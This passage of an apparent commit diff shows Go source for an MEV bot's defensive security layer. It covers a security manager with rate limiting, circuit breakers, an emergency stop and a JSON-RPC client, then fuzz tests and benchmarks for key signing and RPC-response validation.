	LogLevel        string `yaml:"log_level"`
	// RPC endpoint used by secure RPC call delegation
	RPCURL string `yaml:"rpc_url"`
}
// ManagerMetrics holds additional security counters tracked by
// SecurityManager itself (as opposed to the SecurityMonitor's metrics).
// NOTE(review): counters are incremented without atomics while background
// goroutines run — confirm whether concurrent updates are possible.
type ManagerMetrics struct {
	AuthenticationAttempts int64 `json:"authentication_attempts"`
	FailedAuthentications  int64 `json:"failed_authentications"`
	CircuitBreakerTrips    int64 `json:"circuit_breaker_trips"`
	EmergencyStops         int64 `json:"emergency_stops"`
	TLSHandshakeFailures   int64 `json:"tls_handshake_failures"`
}
// CircuitBreaker implements the circuit breaker pattern for fault tolerance.
// State and counters are guarded by mutex; see RecordFailure/RecordSuccess
// and checkCircuitBreakerRecovery for the transition logic.
type CircuitBreaker struct {
	name            string
	failureCount    int       // failures recorded since the last close
	lastFailureTime time.Time // anchors the recovery timeout window
	state           CircuitBreakerState
	config          CircuitBreakerConfig
	mutex           sync.RWMutex
}

// CircuitBreakerState enumerates the breaker's lifecycle states.
type CircuitBreakerState int

const (
	CircuitBreakerClosed   CircuitBreakerState = iota // normal operation, requests flow
	CircuitBreakerOpen                                // tripped, requests rejected
	CircuitBreakerHalfOpen                            // probing whether the component recovered
)

// CircuitBreakerConfig holds breaker tuning parameters.
type CircuitBreakerConfig struct {
	FailureThreshold int           // failures before tripping open
	RecoveryTimeout  time.Duration // delay before an open breaker goes half-open
	MaxRetries       int
}
// NewSecurityManager creates a new security manager with comprehensive protection
func NewSecurityManager(config *SecurityConfig) (*SecurityManager, error) {
if config == nil {
return nil, fmt.Errorf("security config cannot be nil")
}
// Initialize key manager - get encryption key from environment or fail
encryptionKey := os.Getenv("MEV_BOT_ENCRYPTION_KEY")
if encryptionKey == "" {
return nil, fmt.Errorf("MEV_BOT_ENCRYPTION_KEY environment variable is required")
}
keyManagerConfig := &KeyManagerConfig{
KeyDir: config.KeyStoreDir,
KeystorePath: config.KeyStoreDir,
EncryptionKey: encryptionKey,
BackupEnabled: true,
MaxFailedAttempts: 3,
LockoutDuration: 5 * time.Minute,
}
keyManager, err := NewKeyManager(keyManagerConfig, logger.New("info", "json", "logs/keymanager.log"))
if err != nil {
return nil, fmt.Errorf("failed to initialize key manager: %w", err)
}
// Initialize input validator
inputValidator := NewInputValidator(1) // Default chain ID
// Initialize rate limiter
rateLimiterConfig := &RateLimiterConfig{
IPRequestsPerSecond: 100,
IPBurstSize: config.MaxBurstSize,
IPBlockDuration: 5 * time.Minute,
UserRequestsPerSecond: config.TransactionRPS,
UserBurstSize: config.MaxBurstSize,
UserBlockDuration: 5 * time.Minute,
CleanupInterval: 5 * time.Minute,
}
rateLimiter := NewRateLimiter(rateLimiterConfig)
// Initialize security monitor
monitorConfig := &MonitorConfig{
EnableAlerts: true,
AlertBuffer: 1000,
AlertRetention: 24 * time.Hour,
MaxEvents: 10000,
EventRetention: 7 * 24 * time.Hour,
MetricsInterval: time.Minute,
CleanupInterval: time.Hour,
}
monitor := NewSecurityMonitor(monitorConfig)
// Create TLS configuration with security best practices
tlsConfig := &tls.Config{
MinVersion: tls.VersionTLS12, // Enforce TLS 1.2 minimum
CipherSuites: config.TLSCipherSuites,
InsecureSkipVerify: false,
PreferServerCipherSuites: true,
}
// Initialize circuit breakers
rpcCircuitBreaker := &CircuitBreaker{
name: "rpc",
config: CircuitBreakerConfig{
FailureThreshold: config.FailureThreshold,
RecoveryTimeout: config.RecoveryTimeout,
MaxRetries: 3,
},
state: CircuitBreakerClosed,
}
arbitrageCircuitBreaker := &CircuitBreaker{
name: "arbitrage",
config: CircuitBreakerConfig{
FailureThreshold: config.FailureThreshold,
RecoveryTimeout: config.RecoveryTimeout,
MaxRetries: 3,
},
state: CircuitBreakerClosed,
}
// Initialize rate limiters
transactionLimiter := rate.NewLimiter(rate.Limit(config.TransactionRPS), config.MaxBurstSize)
rpcLimiter := rate.NewLimiter(rate.Limit(config.RPCRPS), config.MaxBurstSize)
// Create logger instance
securityLogger := logger.New("info", "json", "logs/security.log")
httpTransport := &http.Transport{
TLSClientConfig: tlsConfig,
}
sm := &SecurityManager{
keyManager: keyManager,
inputValidator: inputValidator,
rateLimiter: rateLimiter,
monitor: monitor,
config: config,
logger: securityLogger,
rpcCircuitBreaker: rpcCircuitBreaker,
arbitrageCircuitBreaker: arbitrageCircuitBreaker,
tlsConfig: tlsConfig,
transactionLimiter: transactionLimiter,
rpcLimiter: rpcLimiter,
emergencyMode: false,
securityAlerts: make([]SecurityAlert, 0),
managerMetrics: &ManagerMetrics{},
rpcHTTPClient: &http.Client{
Timeout: 30 * time.Second,
Transport: httpTransport,
},
}
// Start security monitoring
go sm.startSecurityMonitoring()
sm.logger.Info("Security manager initialized successfully")
return sm, nil
}
// GetKeyManager exposes the manager's single KeyManager instance.
//
// SECURITY FIX: callers must use this accessor rather than constructing
// their own KeyManager, so every component shares one encryption key and
// key derivation stays consistent.
func (sm *SecurityManager) GetKeyManager() *KeyManager {
	km := sm.keyManager
	return km
}
// ValidateTransaction performs pre-flight transaction validation: rate
// limiting, emergency-mode gating, presence of recipient and value, and
// the arbitrage circuit breaker. Returns a descriptive error on the first
// failing check; nil means the transaction may proceed.
func (sm *SecurityManager) ValidateTransaction(ctx context.Context, txParams *TransactionParams) error {
	// Check rate limiting
	if !sm.transactionLimiter.Allow() {
		if sm.monitor != nil {
			sm.monitor.RecordEvent(EventTypeError, "security_manager", "Transaction rate limit exceeded", SeverityMedium, map[string]interface{}{
				"limit_type": "transaction",
			})
		}
		return fmt.Errorf("transaction rate limit exceeded")
	}
	// Check emergency mode.
	// NOTE(review): emergencyMode is written by TriggerEmergencyStop from a
	// background goroutine without synchronization; this read is a data race.
	if sm.emergencyMode {
		return fmt.Errorf("system in emergency mode - transactions disabled")
	}
	// Validate input parameters (simplified validation)
	if txParams.To == nil {
		return fmt.Errorf("transaction validation failed: missing recipient")
	}
	if txParams.Value == nil {
		return fmt.Errorf("transaction validation failed: missing value")
	}
	// FIX: read the breaker state under its RWMutex — RecordFailure and
	// RecordSuccess mutate it under cb.mutex, so an unlocked read races.
	sm.arbitrageCircuitBreaker.mutex.RLock()
	breakerOpen := sm.arbitrageCircuitBreaker.state == CircuitBreakerOpen
	sm.arbitrageCircuitBreaker.mutex.RUnlock()
	if breakerOpen {
		return fmt.Errorf("arbitrage circuit breaker is open")
	}
	return nil
}
// SecureRPCCall performs a JSON-RPC 2.0 call with the manager's security
// controls applied: RPC rate limiting, circuit-breaker gating, the
// TLS-pinned HTTP client, and failure/success accounting for the breaker.
//
// The decoded "result" field is returned as a generic value; if it cannot
// be decoded into interface{}, the raw JSON is returned as a string.
func (sm *SecurityManager) SecureRPCCall(ctx context.Context, method string, params interface{}) (interface{}, error) {
	// Check rate limiting
	if !sm.rpcLimiter.Allow() {
		if sm.monitor != nil {
			sm.monitor.RecordEvent(EventTypeError, "security_manager", "RPC rate limit exceeded", SeverityMedium, map[string]interface{}{
				"limit_type": "rpc",
				"method":     method,
			})
		}
		return nil, fmt.Errorf("RPC rate limit exceeded")
	}
	// FIX: read the breaker state under its RWMutex — RecordFailure and
	// RecordSuccess mutate it under cb.mutex, so an unlocked read races.
	sm.rpcCircuitBreaker.mutex.RLock()
	breakerOpen := sm.rpcCircuitBreaker.state == CircuitBreakerOpen
	sm.rpcCircuitBreaker.mutex.RUnlock()
	if breakerOpen {
		return nil, fmt.Errorf("RPC circuit breaker is open")
	}
	if sm.config.RPCURL == "" {
		err := errors.New("RPC endpoint not configured in security manager")
		sm.RecordFailure("rpc", err)
		return nil, err
	}
	// Coerce caller-supplied params into the positional list JSON-RPC expects.
	paramList, err := normalizeRPCParams(params)
	if err != nil {
		sm.RecordFailure("rpc", err)
		return nil, err
	}
	requestPayload := jsonRPCRequest{
		JSONRPC: "2.0",
		Method:  method,
		Params:  paramList,
		ID:      fmt.Sprintf("sm-%d", rand.Int63()),
	}
	body, err := json.Marshal(requestPayload)
	if err != nil {
		sm.RecordFailure("rpc", err)
		return nil, fmt.Errorf("failed to marshal RPC request: %w", err)
	}
	req, err := http.NewRequestWithContext(ctx, http.MethodPost, sm.config.RPCURL, bytes.NewReader(body))
	if err != nil {
		sm.RecordFailure("rpc", err)
		return nil, fmt.Errorf("failed to create RPC request: %w", err)
	}
	req.Header.Set("Content-Type", "application/json")
	resp, err := sm.rpcHTTPClient.Do(req)
	if err != nil {
		sm.RecordFailure("rpc", err)
		return nil, fmt.Errorf("RPC call failed: %w", err)
	}
	defer resp.Body.Close()
	if resp.StatusCode >= 400 {
		sm.RecordFailure("rpc", fmt.Errorf("rpc endpoint returned status %d", resp.StatusCode))
		return nil, fmt.Errorf("rpc endpoint returned status %d", resp.StatusCode)
	}
	var rpcResp jsonRPCResponse
	if err := json.NewDecoder(resp.Body).Decode(&rpcResp); err != nil {
		sm.RecordFailure("rpc", err)
		return nil, fmt.Errorf("failed to decode RPC response: %w", err)
	}
	if rpcResp.Error != nil {
		err := fmt.Errorf("rpc error %d: %s", rpcResp.Error.Code, rpcResp.Error.Message)
		sm.RecordFailure("rpc", err)
		return nil, err
	}
	var result interface{}
	if len(rpcResp.Result) > 0 {
		if err := json.Unmarshal(rpcResp.Result, &result); err != nil {
			// If we cannot unmarshal into interface{}, return raw JSON
			result = string(rpcResp.Result)
		}
	}
	sm.RecordSuccess("rpc")
	return result, nil
}
// TriggerEmergencyStop activates emergency mode, which disables further
// transaction validation, and records a critical security alert. It
// always returns nil; the error return exists for call-site symmetry.
//
// NOTE(review): emergencyMode and managerMetrics.EmergencyStops are
// written here without synchronization while other goroutines (e.g.
// ValidateTransaction, the monitoring loop) read them — confirm whether a
// mutex or atomic is needed.
func (sm *SecurityManager) TriggerEmergencyStop(reason string) error {
	sm.emergencyMode = true
	sm.managerMetrics.EmergencyStops++
	// Build a critical alert describing why the stop was triggered; manual
	// restart is required per the recommended actions.
	alert := SecurityAlert{
		ID:          fmt.Sprintf("emergency-%d", time.Now().Unix()),
		Timestamp:   time.Now(),
		Level:       AlertLevelCritical,
		Type:        AlertTypeConfiguration,
		Title:       "Emergency Stop Activated",
		Description: fmt.Sprintf("Emergency stop triggered: %s", reason),
		Source:      "security_manager",
		Data: map[string]interface{}{
			"reason": reason,
		},
		Actions: []string{"investigate_cause", "review_logs", "manual_restart_required"},
	}
	sm.addSecurityAlert(alert)
	sm.logger.Error("Emergency stop triggered: " + reason)
	return nil
}
// RecordFailure registers a failure against the named component's circuit
// breaker ("rpc" or "arbitrage"; other names are ignored). The breaker
// trips to Open when the failure threshold is reached while Closed, and —
// per standard circuit-breaker semantics — re-opens immediately on any
// failure while Half-Open (a probe request failed).
func (sm *SecurityManager) RecordFailure(component string, err error) {
	var cb *CircuitBreaker
	switch component {
	case "rpc":
		cb = sm.rpcCircuitBreaker
	case "arbitrage":
		cb = sm.arbitrageCircuitBreaker
	default:
		return
	}
	cb.mutex.Lock()
	defer cb.mutex.Unlock()
	cb.failureCount++
	cb.lastFailureTime = time.Now()
	// FIX: a failure during Half-Open must re-open the breaker. Previously
	// only the Closed->Open transition was handled, so a failed probe left
	// the breaker Half-Open and a later success would wrongly close it.
	tripped := (cb.state == CircuitBreakerClosed && cb.failureCount >= cb.config.FailureThreshold) ||
		cb.state == CircuitBreakerHalfOpen
	if !tripped {
		return
	}
	cb.state = CircuitBreakerOpen
	sm.managerMetrics.CircuitBreakerTrips++
	alert := SecurityAlert{
		ID:          fmt.Sprintf("circuit-breaker-%s-%d", component, time.Now().Unix()),
		Timestamp:   time.Now(),
		Level:       AlertLevelError,
		Type:        AlertTypePerformance,
		Title:       "Circuit Breaker Opened",
		Description: fmt.Sprintf("Circuit breaker opened for component: %s", component),
		Source:      "security_manager",
		Data: map[string]interface{}{
			"component":     component,
			"failure_count": cb.failureCount,
			"error":         err.Error(),
		},
		Actions: []string{"investigate_failures", "check_component_health", "manual_intervention_required"},
	}
	sm.addSecurityAlert(alert)
	sm.logger.Warn(fmt.Sprintf("Circuit breaker opened for component: %s, failure count: %d", component, cb.failureCount))
}
// RecordSuccess registers a successful operation for the named component
// ("rpc" or "arbitrage"; other names are ignored). A success while the
// breaker is Half-Open closes it and clears the failure count; successes
// in other states are no-ops.
func (sm *SecurityManager) RecordSuccess(component string) {
	var cb *CircuitBreaker
	switch component {
	case "rpc":
		cb = sm.rpcCircuitBreaker
	case "arbitrage":
		cb = sm.arbitrageCircuitBreaker
	default:
		return
	}
	cb.mutex.Lock()
	defer cb.mutex.Unlock()
	if cb.state != CircuitBreakerHalfOpen {
		return
	}
	cb.state = CircuitBreakerClosed
	cb.failureCount = 0
	sm.logger.Info(fmt.Sprintf("Circuit breaker closed for component: %s", component))
}
// addSecurityAlert appends an alert to the in-memory buffer (capped at the
// 1000 most recent entries) and forwards it to the security monitor when
// one is configured.
func (sm *SecurityManager) addSecurityAlert(alert SecurityAlert) {
	sm.alertsMutex.Lock()
	defer sm.alertsMutex.Unlock()
	sm.securityAlerts = append(sm.securityAlerts, alert)
	if sm.monitor != nil {
		sm.monitor.TriggerAlert(alert.Level, alert.Type, alert.Title, alert.Description, alert.Source, alert.Data, alert.Actions)
	}
	const maxAlerts = 1000
	if excess := len(sm.securityAlerts) - maxAlerts; excess > 0 {
		sm.securityAlerts = sm.securityAlerts[excess:]
	}
}
// startSecurityMonitoring runs periodic security checks once per minute.
//
// FIX: the previous `select` with a single ticker case (staticcheck S1000)
// is replaced by ranging over the ticker channel directly.
// NOTE(review): there is no stop signal, so this goroutine lives for the
// whole process lifetime even after Shutdown — consider a context or quit
// channel.
func (sm *SecurityManager) startSecurityMonitoring() {
	ticker := time.NewTicker(1 * time.Minute)
	defer ticker.Stop()
	for range ticker.C {
		sm.performSecurityChecks()
	}
}
// performSecurityChecks runs one round of periodic checks: circuit-breaker
// recovery transitions and the on-disk emergency-stop sentinel file.
func (sm *SecurityManager) performSecurityChecks() {
	for _, cb := range []*CircuitBreaker{sm.rpcCircuitBreaker, sm.arbitrageCircuitBreaker} {
		sm.checkCircuitBreakerRecovery(cb)
	}
	if sm.config.EmergencyStopFile == "" {
		return
	}
	if _, err := os.Stat(sm.config.EmergencyStopFile); err == nil {
		// Sentinel file present: an operator requested an emergency stop.
		// TriggerEmergencyStop always returns nil, so the error is discarded.
		_ = sm.TriggerEmergencyStop("emergency stop file detected")
	}
}
// checkCircuitBreakerRecovery moves an Open breaker to Half-Open once the
// recovery timeout has elapsed since its last recorded failure, allowing
// probe requests through.
func (sm *SecurityManager) checkCircuitBreakerRecovery(cb *CircuitBreaker) {
	cb.mutex.Lock()
	defer cb.mutex.Unlock()
	if cb.state != CircuitBreakerOpen {
		return
	}
	if time.Since(cb.lastFailureTime) <= cb.config.RecoveryTimeout {
		return
	}
	cb.state = CircuitBreakerHalfOpen
	sm.logger.Info(fmt.Sprintf("Circuit breaker transitioned to half-open for component: %s", cb.name))
}
// GetManagerMetrics returns the manager's metrics struct.
// NOTE(review): this is a pointer to live, unsynchronized state — callers
// should treat it as read-only snapshots may be inconsistent.
func (sm *SecurityManager) GetManagerMetrics() *ManagerMetrics {
	metrics := sm.managerMetrics
	return metrics
}
// GetSecurityMetrics returns the monitor's current metrics, or an empty
// metrics value when no monitor is configured.
func (sm *SecurityManager) GetSecurityMetrics() *SecurityMetrics {
	if sm.monitor == nil {
		return &SecurityMetrics{}
	}
	return sm.monitor.GetMetrics()
}
// GetSecurityAlerts returns up to limit of the most recent alerts; a
// non-positive or oversized limit returns all stored alerts. The result
// is a copy and safe for the caller to retain.
func (sm *SecurityManager) GetSecurityAlerts(limit int) []SecurityAlert {
	sm.alertsMutex.RLock()
	defer sm.alertsMutex.RUnlock()
	total := len(sm.securityAlerts)
	if limit <= 0 || limit > total {
		limit = total
	}
	first := total - limit
	if first < 0 {
		first = 0
	}
	out := make([]SecurityAlert, limit)
	copy(out, sm.securityAlerts[first:])
	return out
}
// Shutdown gracefully stops the security manager's sub-components and
// releases idle HTTP connections. The ctx parameter is currently unused;
// the method always returns nil.
func (sm *SecurityManager) Shutdown(ctx context.Context) error {
	sm.logger.Info("Shutting down security manager")
	// The sub-components expose no explicit shutdown APIs; log their stop
	// for operational visibility.
	if sm.keyManager != nil {
		sm.logger.Info("Key manager stopped")
	}
	if sm.rateLimiter != nil {
		sm.logger.Info("Rate limiter stopped")
	}
	if sm.monitor != nil {
		sm.logger.Info("Security monitor stopped")
	}
	if sm.rpcHTTPClient != nil {
		sm.rpcHTTPClient.CloseIdleConnections()
	}
	return nil
}
// jsonRPCRequest is the wire format for an outbound JSON-RPC 2.0 request.
type jsonRPCRequest struct {
	JSONRPC string        `json:"jsonrpc"` // always "2.0"
	Method  string        `json:"method"`
	Params  []interface{} `json:"params"`
	ID      string        `json:"id"` // correlation ID, e.g. "sm-<rand>"
}

// jsonRPCError is the error object embedded in a failed JSON-RPC response.
type jsonRPCError struct {
	Code    int    `json:"code"`
	Message string `json:"message"`
}

// jsonRPCResponse is the wire format for a JSON-RPC 2.0 response. Result
// is kept as raw JSON so the caller can defer or skip decoding.
type jsonRPCResponse struct {
	JSONRPC string          `json:"jsonrpc"`
	Result  json.RawMessage `json:"result"`
	Error   *jsonRPCError   `json:"error,omitempty"`
	ID      string          `json:"id"`
}
// normalizeRPCParams coerces arbitrary caller-supplied params into the
// positional []interface{} shape required by JSON-RPC 2.0: nil becomes an
// empty list, slices/arrays are copied element-wise, and any scalar is
// wrapped in a single-element list. It never returns a non-nil error in
// the current implementation; the error return is kept for future use.
func normalizeRPCParams(params interface{}) ([]interface{}, error) {
	if params == nil {
		return []interface{}{}, nil
	}
	// Fast paths for the common concrete types, avoiding reflection.
	switch typed := params.(type) {
	case []interface{}:
		return typed, nil
	case []string:
		out := make([]interface{}, len(typed))
		for i, s := range typed {
			out[i] = s
		}
		return out, nil
	case []int:
		out := make([]interface{}, len(typed))
		for i, n := range typed {
			out[i] = n
		}
		return out, nil
	}
	// Generic path: any other slice or array is unpacked via reflection.
	rv := reflect.ValueOf(params)
	if k := rv.Kind(); k == reflect.Slice || k == reflect.Array {
		out := make([]interface{}, rv.Len())
		for i := range out {
			out[i] = rv.Index(i).Interface()
		}
		return out, nil
	}
	// Scalar: wrap as a single positional parameter.
	return []interface{}{params}, nil
}

View File

@@ -0,0 +1,416 @@
package security
import (
"encoding/json"
"fmt"
"math/big"
"strings"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/fraktal/mev-beta/internal/logger"
)
// newTestLogger builds a plain-text, info-level logger with no log file,
// suitable for tests and fuzz harnesses.
func newTestLogger() *logger.Logger {
	testLogger := logger.New("info", "text", "")
	return testLogger
}
// FuzzRPCResponseParser feeds arbitrary bytes through raw JSON decoding
// and the InputValidator's RPC-response check, asserting neither path
// ever panics.
func FuzzRPCResponseParser(f *testing.F) {
	// Seed corpus: representative well-formed JSON-RPC 2.0 responses.
	seeds := []string{
		`{"jsonrpc":"2.0","id":1,"result":"0x1"}`,
		`{"jsonrpc":"2.0","id":2,"result":{"blockNumber":"0x1b4","hash":"0x..."}}`,
		`{"jsonrpc":"2.0","id":3,"error":{"code":-32000,"message":"insufficient funds"}}`,
		`{"jsonrpc":"2.0","id":4,"result":null}`,
		`{"jsonrpc":"2.0","id":5,"result":[]}`,
	}
	for _, seed := range seeds {
		f.Add([]byte(seed))
	}
	f.Fuzz(func(t *testing.T, data []byte) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("Panic on RPC input: %v\nInput: %q", r, string(data))
			}
		}()
		// Raw JSON decoding must not panic on any input.
		var decoded interface{}
		_ = json.Unmarshal(data, &decoded)
		// Validator path must also be panic-free (Arbitrum chain ID).
		validator := NewInputValidator(42161)
		_ = validator.ValidateRPCResponse(data)
	})
}
// FuzzTransactionSigning builds transactions whose payload is the fuzzed
// byte string and asserts that signing them never panics. Signing errors
// are deliberately ignored — only panic-freedom is checked.
func FuzzTransactionSigning(f *testing.F) {
	// Setup key manager for testing; a 32+ char key satisfies length checks.
	config := &KeyManagerConfig{
		KeystorePath:    "test_keystore",
		EncryptionKey:   "test_encryption_key_for_fuzzing_32chars",
		SessionTimeout:  time.Hour,
		AuditLogPath:    "",
		MaxSigningRate:  1000,
		KeyRotationDays: 30,
	}
	testLogger := newTestLogger()
	km, err := newKeyManagerForTesting(config, testLogger)
	if err != nil {
		// Environment cannot support the harness; skip rather than fail.
		f.Skip("Failed to create key manager for fuzzing")
	}
	// Generate test key
	testKeyAddr, err := km.GenerateKey("test", KeyPermissions{
		CanSign:     true,
		CanTransfer: true,
	})
	if err != nil {
		f.Skip("Failed to generate test key")
	}
	// Seed corpus with valid transaction data
	validTxData := [][]byte{
		{0x02}, // EIP-1559 transaction type
		{0x01}, // EIP-2930 transaction type
		{0x00}, // Legacy transaction type
	}
	for _, data := range validTxData {
		f.Add(data)
	}
	f.Fuzz(func(t *testing.T, data []byte) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("Panic in transaction signing: %v\nInput: %x", r, data)
			}
		}()
		// Try to create transaction from fuzzed data
		if len(data) == 0 {
			return
		}
		// Create a basic transaction for signing tests; the fuzzed bytes
		// become the call data while the other fields stay fixed.
		tx := types.NewTransaction(
			0,                               // nonce
			common.HexToAddress("0x1234"),   // to
			big.NewInt(1000000000000000000), // value (1 ETH)
			21000,                           // gas limit
			big.NewInt(20000000000),         // gas price (20 gwei)
			data,                            // data
		)
		// Test signing (errors ignored; panic-freedom is the property under test)
		request := &SigningRequest{
			Transaction:  tx,
			From:         testKeyAddr,
			Purpose:      "fuzz_test",
			ChainID:      big.NewInt(42161),
			UrgencyLevel: 1,
		}
		_, _ = km.SignTransaction(request)
	})
}
// FuzzKeyValidation tests key validation with various encryption keys
func FuzzKeyValidation(f *testing.F) {
// Seed with common weak keys
weakKeys := []string{
"test123",
"password",
"12345678901234567890123456789012",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"test_encryption_key_default_config",
}
for _, key := range weakKeys {
f.Add(key)
}
f.Fuzz(func(t *testing.T, encryptionKey string) {
defer func() {
if r := recover(); r != nil {
t.Errorf("Panic in key validation: %v\nKey: %q", r, encryptionKey)
}
}()
config := &KeyManagerConfig{
EncryptionKey: encryptionKey,
KeystorePath: "test_keystore",
}
// This should not panic, even with invalid keys
err := validateProductionConfig(config)
// Check for expected security rejections
if strings.Contains(strings.ToLower(encryptionKey), "test") ||
strings.Contains(strings.ToLower(encryptionKey), "default") ||
len(encryptionKey) < 32 {
if err == nil {
t.Errorf("Expected validation error for weak key: %q", encryptionKey)
}
}
})
}
// FuzzInputValidator exercises RPC-response validation and big-integer
// parsing with arbitrary address-like strings, asserting neither panics.
func FuzzInputValidator(f *testing.F) {
	validator := NewInputValidator(42161)
	// Seed with assorted address formats, including malformed ones.
	for _, seed := range []string{
		"0x1234567890123456789012345678901234567890",
		"0x0000000000000000000000000000000000000000",
		"0xffffffffffffffffffffffffffffffffffffffff",
		"0x",
		"",
		"not_an_address",
	} {
		f.Add(seed)
	}
	f.Fuzz(func(t *testing.T, addressStr string) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("Panic in address validation: %v\nAddress: %q", r, addressStr)
			}
		}()
		// Embed the fuzzed string inside a JSON-RPC result and validate.
		payload := []byte(fmt.Sprintf(`{"jsonrpc":"2.0","id":1,"result":"%s"}`, addressStr))
		_ = validator.ValidateRPCResponse(payload)
		// When the string starts with a digit, exercise big.Int parsing too;
		// only panic-freedom matters here.
		if len(addressStr) == 0 || addressStr[0] < '0' || addressStr[0] > '9' {
			return
		}
		amount := new(big.Int)
		amount.SetString(addressStr, 10)
		_ = amount.Sign()
	})
}
// TestConcurrentKeyAccess verifies that the key manager can sign from 100
// goroutines (10 signings each) without errors. Run with -race to surface
// data races in the key-manager internals.
func TestConcurrentKeyAccess(t *testing.T) {
	config := &KeyManagerConfig{
		KeystorePath:    "test_concurrent_keystore",
		EncryptionKey:   "concurrent_test_encryption_key_32c",
		SessionTimeout:  time.Hour,
		MaxSigningRate:  1000,
		KeyRotationDays: 30,
	}
	testLogger := newTestLogger()
	km, err := newKeyManagerForTesting(config, testLogger)
	if err != nil {
		t.Fatalf("Failed to create key manager: %v", err)
	}
	// Generate test key
	testKeyAddr, err := km.GenerateKey("concurrent_test", KeyPermissions{
		CanSign:     true,
		CanTransfer: true,
	})
	if err != nil {
		t.Fatalf("Failed to generate test key: %v", err)
	}
	// Test concurrent signing. The buffered channel has exactly one slot
	// per expected result so no sender blocks.
	const numGoroutines = 100
	const signingsPerGoroutine = 10
	results := make(chan error, numGoroutines*signingsPerGoroutine)
	for i := 0; i < numGoroutines; i++ {
		go func(workerID int) {
			for j := 0; j < signingsPerGoroutine; j++ {
				// Unique nonce and payload per (worker, iteration) pair.
				tx := types.NewTransaction(
					uint64(workerID*signingsPerGoroutine+j),
					common.HexToAddress("0x1234"),
					big.NewInt(1000000000000000000),
					21000,
					big.NewInt(20000000000),
					[]byte(fmt.Sprintf("worker_%d_tx_%d", workerID, j)),
				)
				request := &SigningRequest{
					Transaction:  tx,
					From:         testKeyAddr,
					Purpose:      fmt.Sprintf("concurrent_test_%d_%d", workerID, j),
					ChainID:      big.NewInt(42161),
					UrgencyLevel: 1,
				}
				_, err := km.SignTransaction(request)
				results <- err
			}
		}(i)
	}
	// Collect results; receiving the full count also synchronizes with all
	// goroutines finishing.
	for i := 0; i < numGoroutines*signingsPerGoroutine; i++ {
		if err := <-results; err != nil {
			t.Errorf("Concurrent signing failed: %v", err)
		}
	}
}
// TestSecurityMetrics exercises RPC-response validation across valid,
// malformed, empty, and oversized payloads.
func TestSecurityMetrics(t *testing.T) {
	validator := NewInputValidator(42161)
	cases := []struct {
		name    string
		payload func() []byte
		wantErr bool
	}{
		{
			name:    "valid_rpc_response",
			payload: func() []byte { return []byte(`{"jsonrpc":"2.0","id":1,"result":"0x1"}`) },
			wantErr: false,
		},
		{
			name:    "invalid_rpc_response",
			payload: func() []byte { return []byte(`invalid json`) },
			wantErr: true,
		},
		{
			name:    "empty_rpc_response",
			payload: func() []byte { return []byte{} },
			wantErr: true,
		},
		{
			// 11MB exceeds the validator's 10MB cap.
			name:    "oversized_rpc_response",
			payload: func() []byte { return make([]byte, 11*1024*1024) },
			wantErr: true,
		},
	}
	for _, tc := range cases {
		tc := tc
		t.Run(tc.name, func(t *testing.T) {
			err := validator.ValidateRPCResponse(tc.payload())
			if tc.wantErr && err == nil {
				t.Errorf("Expected error for %s, but got none", tc.name)
			}
			if !tc.wantErr && err != nil {
				t.Errorf("Unexpected error for %s: %v", tc.name, err)
			}
		})
	}
}
// BenchmarkSecurityOperations benchmarks the two hottest security paths:
// transaction signing through the key manager and RPC-response
// validation. Sub-benchmarks share the key-manager setup done here.
func BenchmarkSecurityOperations(b *testing.B) {
	config := &KeyManagerConfig{
		KeystorePath:    "benchmark_keystore",
		EncryptionKey:   "benchmark_encryption_key_32chars",
		SessionTimeout:  time.Hour,
		MaxSigningRate:  10000, // high rate so rate limiting does not dominate the benchmark
		KeyRotationDays: 30,
	}
	testLogger := newTestLogger()
	km, err := newKeyManagerForTesting(config, testLogger)
	if err != nil {
		b.Fatalf("Failed to create key manager: %v", err)
	}
	testKeyAddr, err := km.GenerateKey("benchmark_test", KeyPermissions{
		CanSign:     true,
		CanTransfer: true,
	})
	if err != nil {
		b.Fatalf("Failed to generate test key: %v", err)
	}
	// One fixed transaction reused across iterations; only the signing
	// request's Purpose varies.
	tx := types.NewTransaction(
		0,
		common.HexToAddress("0x1234"),
		big.NewInt(1000000000000000000),
		21000,
		big.NewInt(20000000000),
		[]byte("benchmark_data"),
	)
	b.Run("SignTransaction", func(b *testing.B) {
		for i := 0; i < b.N; i++ {
			request := &SigningRequest{
				Transaction:  tx,
				From:         testKeyAddr,
				Purpose:      fmt.Sprintf("benchmark_%d", i),
				ChainID:      big.NewInt(42161),
				UrgencyLevel: 1,
			}
			_, err := km.SignTransaction(request)
			if err != nil {
				b.Fatalf("Signing failed: %v", err)
			}
		}
	})
	validator := NewInputValidator(42161)
	b.Run("ValidateRPCResponse", func(b *testing.B) {
		testData := []byte(`{"jsonrpc":"2.0","id":1,"result":"0x1"}`)
		for i := 0; i < b.N; i++ {
			_ = validator.ValidateRPCResponse(testData)
		}
	})
}
// ValidateRPCResponse sanity-checks a raw JSON-RPC response: it must be
// non-empty, at most 10MB, valid JSON, and — when a top-level "jsonrpc"
// field is present — carry version "2.0". Responses that are not JSON
// objects (arrays, scalars) pass the version check by default.
func (iv *InputValidator) ValidateRPCResponse(data []byte) error {
	switch {
	case len(data) == 0:
		return fmt.Errorf("empty RPC response")
	case len(data) > 10*1024*1024:
		return fmt.Errorf("RPC response too large: %d bytes", len(data))
	}
	var parsed interface{}
	if err := json.Unmarshal(data, &parsed); err != nil {
		return fmt.Errorf("invalid JSON in RPC response: %w", err)
	}
	obj, isObject := parsed.(map[string]interface{})
	if !isObject {
		return nil
	}
	version, present := obj["jsonrpc"]
	if !present {
		return nil
	}
	if versionStr, ok := version.(string); !ok || versionStr != "2.0" {
		return fmt.Errorf("invalid JSON-RPC version")
	}
	return nil
}

View File

@@ -0,0 +1,435 @@
package security
import (
"context"
"fmt"
"math/big"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/ethclient"
"github.com/fraktal/mev-beta/internal/logger"
)
// TransactionSecurity provides comprehensive transaction security checks
// for MEV transactions: input validation, safe-arithmetic bounds, address
// blacklisting, and simple per-address rate limiting.
type TransactionSecurity struct {
	logger         *logger.Logger
	inputValidator *InputValidator
	safeMath       *SafeMath
	client         *ethclient.Client // RPC client for on-chain lookups
	chainID        uint64
	// Security thresholds
